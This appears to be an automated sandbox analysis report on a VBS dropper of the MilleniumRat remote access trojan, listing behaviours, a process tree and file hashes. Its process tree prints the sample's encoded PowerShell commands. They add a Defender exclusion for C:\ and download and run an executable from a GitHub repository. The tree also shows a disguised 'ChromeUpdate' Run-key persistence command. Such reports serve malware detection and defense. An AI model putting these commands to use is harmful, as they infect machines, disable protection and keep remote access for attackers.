Analysis
-
max time kernel
129s -
max time network
101s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
04-06-2024 09:25
Static task
static1
Behavioral task
behavioral1
Sample
d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs
Resource
win10v2004-20240508-en
General
-
Target
d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs
-
Size
289KB
-
MD5
ac7f96ac94ca748354e7db225aa1a5b2
-
SHA1
98be163399271b71337afbc716b6a313ea1941e6
-
SHA256
d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e
-
SHA512
862f9d5bc0d4ba27cfa7d75b4974e4eb37d30f53de883419c3e1e7c62fb525a2964e8431b5b5c91e1d2654db5446bba60320d196b148b35480eec2ed2cc26692
-
SSDEEP
6144:Xm/uolvrxUXllOuQcTN5eZ2cH5d/ozSxCP27kbn8buCW+ZFU/Chpav1GUTs8quIr:W2svrwmuQ2yp5keCPtb8b1HZSCSDs8q/
Malware Config
Signatures
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 26 5060 powershell.exe 28 5060 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Update.exeWScript.exeWScript.exexleUhZDLQGPMshedPatXqZ.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation Update.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation xleUhZDLQGPMshedPatXqZ.exe -
Executes dropped EXE 2 IoCs
Processes:
xleUhZDLQGPMshedPatXqZ.exeUpdate.exepid process 624 xleUhZDLQGPMshedPatXqZ.exe 3824 Update.exe -
Loads dropped DLL 2 IoCs
Processes:
xleUhZDLQGPMshedPatXqZ.exeUpdate.exepid process 624 xleUhZDLQGPMshedPatXqZ.exe 3824 Update.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Processes:
flow ioc 38 raw.githubusercontent.com 41 raw.githubusercontent.com 27 raw.githubusercontent.com 28 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 36 ip-api.com -
Processes:
powershell.exepowershell.exepid process 220 powershell.exe 5060 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Update.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3636 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Modifies registry key 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 51 IoCs
Processes:
powershell.exepowershell.exexleUhZDLQGPMshedPatXqZ.exeUpdate.exepid process 220 powershell.exe 220 powershell.exe 5060 powershell.exe 5060 powershell.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 624 xleUhZDLQGPMshedPatXqZ.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe 3824 Update.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exexleUhZDLQGPMshedPatXqZ.exetasklist.exeUpdate.exedescription pid process Token: SeDebugPrivilege 220 powershell.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeDebugPrivilege 624 xleUhZDLQGPMshedPatXqZ.exe Token: SeDebugPrivilege 4936 tasklist.exe Token: SeDebugPrivilege 3824 Update.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Update.exepid process 3824 Update.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
WScript.exeWScript.exepowershell.exexleUhZDLQGPMshedPatXqZ.execmd.exeUpdate.execmd.execmd.execmd.exedescription pid process target process PID 3708 wrote to memory of 4312 3708 WScript.exe WScript.exe PID 3708 wrote to memory of 4312 3708 WScript.exe WScript.exe PID 4312 wrote to memory of 220 4312 WScript.exe powershell.exe PID 4312 wrote to memory of 220 4312 WScript.exe powershell.exe PID 4312 wrote to memory of 5060 4312 WScript.exe powershell.exe PID 4312 wrote to memory of 5060 4312 WScript.exe powershell.exe PID 5060 wrote to memory of 624 5060 powershell.exe xleUhZDLQGPMshedPatXqZ.exe PID 5060 wrote to memory of 624 5060 powershell.exe xleUhZDLQGPMshedPatXqZ.exe PID 624 wrote to memory of 1932 624 xleUhZDLQGPMshedPatXqZ.exe cmd.exe PID 624 wrote to memory of 1932 624 xleUhZDLQGPMshedPatXqZ.exe cmd.exe PID 1932 wrote to memory of 4936 1932 cmd.exe tasklist.exe PID 1932 wrote to memory of 4936 1932 cmd.exe tasklist.exe PID 1932 wrote to memory of 3668 1932 cmd.exe find.exe PID 1932 wrote to memory of 3668 1932 cmd.exe find.exe PID 1932 wrote to memory of 3636 1932 cmd.exe timeout.exe PID 1932 wrote to memory of 3636 1932 cmd.exe timeout.exe PID 1932 wrote to memory of 3824 1932 cmd.exe Update.exe PID 1932 wrote to memory of 3824 1932 cmd.exe Update.exe PID 3824 wrote to memory of 3140 3824 Update.exe cmd.exe PID 3824 wrote to memory of 3140 3824 Update.exe cmd.exe PID 3140 wrote to memory of 1992 3140 cmd.exe reg.exe PID 3140 wrote to memory of 1992 3140 cmd.exe reg.exe PID 3824 wrote to memory of 1400 3824 Update.exe cmd.exe PID 3824 wrote to memory of 1400 3824 Update.exe cmd.exe PID 3824 wrote to memory of 4196 3824 Update.exe cmd.exe PID 3824 wrote to memory of 4196 3824 Update.exe cmd.exe PID 3824 wrote to memory of 4732 3824 Update.exe cmd.exe PID 3824 wrote to memory of 4732 3824 Update.exe cmd.exe PID 1400 wrote to memory of 2872 1400 cmd.exe reg.exe PID 1400 wrote to memory of 2872 1400 cmd.exe reg.exe PID 4196 wrote to memory of 2780 4196 cmd.exe reg.exe PID 4196 wrote to memory of 2780 4196 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs" /elevate2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TNuiO = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=')); Invoke-Expression -Command $TNuiO3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $unLyJ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('aQB3AHIAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBkAGUAdgBjAHIAaQBpAGkALwBSAEEAVABUAC8AcgBhAHcALwBtAGEAaQBuAC8AYgB1AGkAbAB0AC4AZQB4AGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGUAbgB2ADoAVABFAE0AUABcAHgAbABlAFUAaABaAEQATABRAEcAUABNAHMAaABlAGQAUABhAHQAWABxAFoALgBlAHgAZQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAVABFAE0AUABcAHgAbABlAFUAaABaAEQATABRAEcAUABNAHMAaABlAGQAUABhAHQAWABxAFoALgBlAHgAZQA=')); Invoke-Expression -Command $unLyJ3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Users\Admin\AppData\Local\Temp\xleUhZDLQGPMshedPatXqZ.exe"C:\Users\Admin\AppData\Local\Temp\xleUhZDLQGPMshedPatXqZ.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp924D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp924D.tmp.bat5⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 624"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\system32\find.exefind ":"6⤵PID:3668
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak6⤵
- Delays execution with timeout.exe
PID:3636
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f7⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f8⤵
- Adds Run key to start application
- Modifies registry key
PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /f7⤵
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /f8⤵
- Modifies registry key
PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete HKCU\Software\ChromeUpdateCash /f7⤵
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\system32\reg.exereg delete HKCU\Software\ChromeUpdateCash /f8⤵
- Modifies registry key
PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp4EC7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp4EC7.tmp.bat7⤵PID:4732
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5e9c5f9e7437285aa87e4433bc7e0f9d7
SHA12363ddac1155a065a54dc6a0fc307d86bd88246b
SHA2560cb341e3c6fd873cf50bd24821761efdaec49406557f21db3f1a4ee68796b520
SHA5127cc866c84540c274e013a0eb453e89a27a52a410923ee28488f9b88d6fd8dad77c6e7e99e1cf97dc6202233a7d093e89bfc22eae3102d50cd83207d98b2f3cb2
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
186B
MD58fad6938408246fb24d9b2c4decf7590
SHA1e57084e7fc883a790e8d579a82d5028183fa188d
SHA256b221ed81c657ab46b113b008a52460e9cd8240ac7850104041ae452c5c26b839
SHA512248ff24bf0f0082822c095ae6e8f361e23db73e0e096eaa21ba43eb8493256472fdaec44ff20a508f66a933333f7bd2e437217eb8618d7a3caf5e75dafffdfef
-
Filesize
289B
MD57dd52557da38777e0309b525eb846eab
SHA11a8f0142009a066e0aa08a81bce3eeb36b4379d7
SHA25681967b0d53a3cb834118daed75542b0e4309ddf3715bc800a8fadd8402a3a698
SHA51288beeadb54a0b48430f0fc2ce6584a63ef5523d160d39fe521dcd9face44dcc78b22637d7185995b72d0fa0b06cf98b51a913ee28392522013b9b5d60e6e4e29
-
Filesize
5.6MB
MD5c8955a21f7c008f1a1e4cd1c4471fe14
SHA1021ec08ccfb4e4719ad74cc97c6c317b64fca739
SHA2560f26acbeb99a1422b245cc54268220081884d352aab589bdafb2a81aab1da079
SHA5122a41bdc1b307ae0140559abe545a48c5817b221d865a18dac29eb38acab29638312f900ff77333af22419745db3b009ed4ad5fef332c24f630746155671603a5
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84